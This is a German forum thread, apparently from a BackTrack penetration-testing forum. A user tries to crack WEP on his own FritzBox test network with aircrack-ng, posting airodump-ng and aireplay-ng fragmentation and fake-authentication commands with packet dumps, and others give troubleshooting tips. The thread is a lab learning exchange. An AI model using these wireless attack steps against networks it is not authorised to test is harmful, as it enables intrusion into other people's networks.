Aircrack-ng frage

**icaros** · 01-26-2010, 11:08 AM

Hi Experten,

ich bin ja nicht der einzige der mit aircrack so seine Schwieigkeiten hat.

Also ich habe folgendes Problem:

Habe mir die Aircrack-ng Dokumentation durchgelesen und habe mir dann eine FritzBox 7270 als Testobject mit WEP aufgebaut. In diesem Wlan befinden sich keine Clients!

Habe die Wlankarte mit airmon start wlan0 in den Monitormode versetzt

Ich konzentriere mich dann mittels

airodump-ng --bssid 00:1F:3F:1E:69:26 --channel 10 --ivs -w test mon0

auf mein test Wlan

das geht auch ganz gut.

So jetzt möchte ich einen Keystream generieren

Code:

user@lucy:~$ aireplay-ng -5 -b 00:1F:3F:1E:69:26 mon0
[sudo] password for tobias: 
No source MAC (-h) specified. Using the device MAC (00:22:FA:C5:9B:C0)
10:57:32  Waiting for beacon frame (BSSID: 00:1F:3F:1E:69:26) on channel 10
10:57:32  Waiting for a data packet...
Read 5249 packets...

        Size: 76, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:1F:3F:1E:69:26
          Dest. MAC  =  01:00:5E:00:00:01
         Source MAC  =  00:1C:4A:2B:4F:BC

        0x0000:  0842 0000 0100 5e00 0001 001f 3f1e 6926  .B....^.....?.i&
        0x0010:  001c 4a2b 4fbc 4004 4994 7600 2ff4 e791  ..J+O.@.I.v./...
        0x0020:  fbc4 872f 3577 1f2d 5c5d 4a41 9863 e8ef  .../5w.-\]JA.c..
        0x0030:  d6d3 c334 7a72 1567 61dd b2a6 d929 e2e2  ...4zr.ga....)..
        0x0040:  8fdc ccca 2b5d 7d4c 42e6 9501            ....+]}LB...

Use this packet ? y

Saving chosen packet in replay_src-0126-110133.cap
11:01:53  Data packet found!
11:01:53  Sending fragmented packet
11:01:55  No answer, repeating...
11:01:55  Trying a LLC NULL packet
11:01:55  Sending fragmented packet
11:01:57  No answer, repeating...
11:01:57  Sending fragmented packet
11:01:58  No answer, repeating...
11:01:58  Trying a LLC NULL packet
11:01:58  Sending fragmented packet
11:02:00  No answer, repeating...
11:02:00  Sending fragmented packet
11:02:01  No answer, repeating...
11:02:01  Trying a LLC NULL packet
11:02:01  Sending fragmented packet
11:02:03  No answer, repeating...
11:02:03  Sending fragmented packet
11:02:04  No answer, repeating...
11:02:04  Trying a LLC NULL packet
11:02:04  Sending fragmented packet
11:02:06  No answer, repeating...
11:02:06  Sending fragmented packet
11:02:07  No answer, repeating...
11:02:07  Trying a LLC NULL packet
11:02:07  Sending fragmented packet
11:02:09  No answer, repeating...
11:02:09  Sending fragmented packet
11:02:10  No answer, repeating...
11:02:10  Still nothing, trying another packet...
Read 430 packets...

        Size: 359, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:1F:3F:1E:69:26
          Dest. MAC  =  01:00:5E:7F:FF:FA
         Source MAC  =  00:1C:4A:2B:4F:BC

        0x0000:  0842 0000 0100 5e7f fffa 001f 3f1e 6926  .B....^....?.i&
        0x0010:  001c 4a2b 4fbc 5004 4994 7700 9a0a b11a  ..J+O.P.I.w.....
        0x0020:  4221 c180 e968 9acb 974b 9550 6f9a 6525  B!...h...K.Po.e%
        0x0030:  4b8d 45de 126b 5541 679d 62f6 406b bd09  K.E..kUAg.b.@k..
        0x0040:  3655 9d54 6112 c000 017f b931 9bde 60cb  6U.Ta.....1..`.
        0x0050:  cf73 875a 1836 b845 3cc2 e7d2 c974 ab77  .s.Z.6.E<....t.w
        0x0060:  0df6 a1a2 74fa 01d9 8a74 a4cb edd0 6691  ....t....t....f.
        0x0070:  4d14 0d06 089f 0a44 6b08 f20e 5e4d 3efd  M......Dk...^M>.
        0x0080:  f998 3b3c 5120 5e47 ee6b 256e 2fc8 a564  ..;<Q ^G.k%n/..d
        0x0090:  8282 0b60 656a bee2 71b1 7558 ce60 fb30  ...`ej..q.uX.`.0
        0x00a0:  0ade 49dc f3cd ff1f 7a87 fb96 d656 1826  ..I.....z....V.&
        0x00b0:  27e0 ac40 8f72 4265 4f35 dbb8 75e5 4cf6  '..@.rBeO5..u.L.
        0x00c0:  be7b a55c 1663 0513 178b ba46 ed48 3aca  .{.\.c.....F.H:.
        0x00d0:  9180 b0d8 05bf 7696 c1ee cff6 4095 a13f  ......v.....@..?
        --- CUT ---

Use this packet ?

Dieses Spielchen kann ich dann ewig weiter spielen ohne ein Ergebnis.

Leider haeb ich keine Ahnung warum das so ist.

Kann mir das evtl. jemand erklären oder einen Tip geben wie es sonst Funktioniert.

Danke und Gruß
-icaros

**m-1-k-3** · 01-26-2010, 11:42 AM

Originally Posted by icaros

airodump-ng --bssid 00:1F:3F:1E:69:26 --channel 10 --ivs -w test mon0

Dieses Spielchen kann ich dann ewig weiter spielen ohne ein Ergebnis.

--ivs brauchst du nicht

Aber zu deinem Problem, hierfür gibt es unterschiedlichste Möglichkeiten. Meistens kommst du mit folgenden Methoden zu einem Ergebnis:

Reboote den WLAN Router
Variiere den Abstand von Router zu Client
Versuche die KoreK chopchop attack

hf
m-1-k-3

**iLoad** · 01-26-2010, 02:53 PM

Musst du dich nicht erst beim Router anmelden? (fake authentication)

**m-1-k-3** · 01-26-2010, 03:36 PM

Originally Posted by iLoad

Musst du dich nicht erst bei Router anmelden? (fake authentication)

jap muss er ...

**icaros** · 01-28-2010, 11:06 AM

Hi,

erstmal Danke für eure Antworten.

Hier jetzt noch mal meine geänderte Vorgehensweise:

Code:

CH 10 ][ Elapsed: 8 s ][ 2010-01-28 10:44 ][ fixed channel mon0: 7                     7                                         
                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                        
                                                                                                                           
 00:1F:3F:1E:69:26  -39  49       49        0    0  10  54e. WEP  WEP         test                                         
                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

dann gehts weiter mit:

Code:

airepaly -1 1 -a 00:1F:3F:1E:69:26 mon0
No source MAC (-h) specified. Using the device MAC (00:22:FA:C5:9B:C0)
10:46:34  Waiting for beacon frame (BSSID: 00:1F:3F:1E:69:26) on channel 10

10:46:34  Sending Authentication Request (Open System) [ACK]
10:46:34  Authentication successful
10:46:34  Sending Association Request [ACK]
10:46:34  Association successful :-) (AID: 1)

10:46:35  Sending Authentication Request (Open System) [ACK]
10:46:35  Authentication successful
10:46:35  Sending Association Request [ACK]
10:46:35  Association successful :-) (AID: 1)

10:46:36  Sending Authentication Request (Open System) [ACK]
10:46:36  Authentication successful
10:46:36  Sending Association Request [ACK]
10:46:36  Association successful :-) (AID: 1)

so weit so gut.

Code:

CH 10 ][ Elapsed: 2 mins ][ 2010-01-28 10:47 ][ fixed channel mon0: 7 7                                         
                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                        
                                                                                                                           
 00:1F:3F:1E:69:26  -33 100      944        0    0  10  54e. WEP  WEP    OPN  test                                         
                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                 
                                                                                                                           
 00:1F:3F:1E:69:26  00:22:FA:C5:9B:C0    0    0 - 1     28      276                                                         
^C

jetzt

Code:

tobias@lucy:~$ sudo aireplay-ng -5 -b 00:1F:3F:1E:69:26 mon0
No source MAC (-h) specified. Using the device MAC (00:22:FA:C5:9B:C0)
10:49:42  Waiting for beacon frame (BSSID: 00:1F:3F:1E:69:26) on channel 10
10:49:42  Waiting for a data packet...
Read 277 packets...

        Size: 359, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:1F:3F:1E:69:26
          Dest. MAC  =  01:00:5E:7F:FF:FA
         Source MAC  =  00:1C:4A:2B:4F:BC

        0x0000:  0842 0000 0100 5e7f fffa 001f 3f1e 6926  .B....^^?....?.i&
        0x0010:  001c 4a2b 4fbc f003 305b a200 d216 8457  ..J+O...0[.....W
        0x0020:  265a 5002 0f9f bfb5 4ab2 01ba b8e6 bce8  &ZP.....J.......
        0x0030:  7ca2 613c 1727 4fba fdc8 49ea e737 cf66  |.a<.'O...I..7.f
        0x0040:  a40b 5cba d1f9 13e6 05b3 be2b 9c10 5088  ..\........+..P.
        0x0050:  e2cb 26bb 2415 3bfc 8a85 11c9 7652 8dae  ..&.$.;.....vR..
        0x0060:  3310 7fde 2e19 4ff9 f0cf 3542 6349 bda7  3.^?...O...5BcI..
        0x0070:  fe63 71c3 86d6 834a 5bb8 9044 592b 805e  .cq....J[..DY+.^
        0x0080:  4c29 2f6f 9e21 ca78 ae86 024c 34c5 f3d3  L)/o.!.x...L4...
        0x0090:  12c9 07ba 6851 fea6 1b08 0362 dcc4 77b9  ....hQ.....b..w.
        0x00a0:  3595 5494 8038 c7c3 f389 3cbf 3c6c 955e  5.T..8....<.<l.^
        0x00b0:  b807 08eb 9614 e5f6 e9c8 a1a8 685e 7bc3  ............h^{.
        0x00c0:  2840 3bbe 8de8 6099 71bc 1813 74a2 13cc  (@;...`.q...t...
        0x00d0:  81e8 24d9 3428 3663 d5be 7aca 248b 4cf2  ..$.4(6c..z.$.L.
        --- CUT ---

Use this packet ?

So ab hier komme ich nicht mehr weiter auch nicht mit chopchop. Mich würde auch mal interessieren woher die Dest. MAC und die Source MAC stammen.

Danke schon mal und Gruß
-Icaros

......................

habe immer noch das gleiche Problem. Habe mich jetzt wie von euch gesagt erst mittels aireplay -1 am Router angemeldet. Dann kome ich aber immer noch nicht weiter. Kann das evtl. an der FritzBox liegen, das diese solche angriffe evtl. blockiert?

Schon mal Danke und Gruß

BackTrack Linux - Penetration Testing Distribution

Thread: Aircrack-ng frage

Thread Tools

Search Thread

Display

Hybrid View

Aircrack-ng frage

Posting Permissions